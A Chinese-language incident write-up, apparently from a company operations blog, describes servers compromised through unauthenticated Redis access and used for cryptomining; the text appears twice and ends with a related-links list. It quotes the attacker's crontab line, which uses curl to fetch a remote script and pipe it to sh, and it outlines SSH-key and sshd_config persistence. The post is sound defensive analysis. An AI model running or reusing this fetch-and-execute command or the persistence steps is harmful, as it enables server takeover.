redis未授权访问导致的安全问题
2016-11-23 00:00
253 查看
摘要: redis未授权访问导致安全运维问题
近日公司多个线上服务器发生CPU使用率过高、及crontab改动触发的报警,登录后检查发现被植入挖矿木马。经分析,这些被植入恶意木马的主机均存在redis服务。推测中招的可能为服务器因需暂时关闭火墙,导致“redis未授权访问”引发而产生安全问题。
对其进行分析,crontab植入计划任务: */10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?106 | sh
下载pm.sh脚本,分析知,通过redis未授权访问的漏洞,通过authorized_keys免密码登录后,修改计划任务下载恶意脚本并执行,同时在/root/.ssh/目录下创建KHK75NEOiq文件,修改AuthorizedKeysFile的指向,删除authorized_keys文件,并修改sshd_config配置文件,同时让恶意文件依附于ntp进程,在/opt目录下生成恶意文件,如下所示:
在之前的安全检测中,发现多个挖矿木马进程,或者说起了不同的名字:minerd、yam……。如下所示:
当存在以上进程时,可能会同时存在一个被恶意植入进程lady,如果存在,需立即service lady stop。
针对以上问题的处理也比较容易,根据恶意脚本反推即可。同时要注意redis服务的安全配置。我们之前已对redis服务及防火墙策略做了安全加固,但由于某些主机可能需要暂时关闭火墙的瞬间,给恶意攻击者以可趁之机。
文章归档:http://secscorpio.top/?p=80
近日公司多个线上服务器发生CPU使用率过高、及crontab改动触发的报警,登录后检查发现被植入挖矿木马。经分析,这些被植入恶意木马的主机均存在redis服务。推测中招的可能为服务器因需暂时关闭火墙,导致“redis未授权访问”引发而产生安全问题。
对其进行分析,crontab植入计划任务: */10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?106 | sh
下载pm.sh脚本,分析知,通过redis未授权访问的漏洞,通过authorized_keys免密码登录后,修改计划任务下载恶意脚本并执行,同时在/root/.ssh/目录下创建KHK75NEOiq文件,修改AuthorizedKeysFile的指向,删除authorized_keys文件,并修改sshd_config配置文件,同时让恶意文件依附于ntp进程,在/opt目录下生成恶意文件,如下所示:
在之前的安全检测中,发现多个挖矿木马进程,或者说起了不同的名字:minerd、yam……。如下所示:
当存在以上进程时,可能会同时存在一个被恶意植入进程lady,如果存在,需立即service lady stop。
针对以上问题的处理也比较容易,根据恶意脚本反推即可。同时要注意redis服务的安全配置。我们之前已对redis服务及防火墙策略做了安全加固,但由于某些主机可能需要暂时关闭火墙的瞬间,给恶意攻击者以可趁之机。
文章归档:http://secscorpio.top/?p=80
相关文章推荐
- 解决自定义AuthorizeAttribute实现授权管理,AllowAnonymous属性失效导致无法匿名访问控制器的问题
- Redis 未授权访问缺陷可轻易导致系统被黑
- Redis 未授权访问缺陷可轻易导致系统被黑【SSV-89715】
- redis未授权访问导致远程登陆服务器
- Redis未授权访问导致可远程获得服务器权限
- Redis 未授权访问缺陷可轻易导致系统被黑
- Redis未授权访问导致服务器被控制
- 如何拿回被恶意或者不小心删除硬盘所有者权限而导致的文件访问以及修改权限被限制(NTFS格式安全权限问题)
- UCloud-201809-001:Redis服务未授权访问漏洞安全预警
- Redis 未授权访问缺陷可轻易导致系统被黑
- Redis 未授权访问缺陷可轻易导致系统被黑
- CFileDialog改变文件路径导致的一系列问题(如无法安全删除u盘、访问相对路径失败)的解决方法
- 解决自定义AuthorizeAttribute实现授权管理,AllowAnonymous属性失效导致无法匿名访问控制器的问题
- XP下如何解决“ASP.NET 未被授权访问所请求的资源”的问题
- 解决windows的数据访问保护(DEP)导致windows installer不能工作的问题
- CAS代码访问安全问题(1)
- Mysql对数据库访问IP授权问题
- ASP.NET安全问题--ASP.NET中的授权问题(前篇)
- 本地运行swf访问网络的安全问题解决办法
- Ajax访问Xml Web Service的安全问题以及解决方案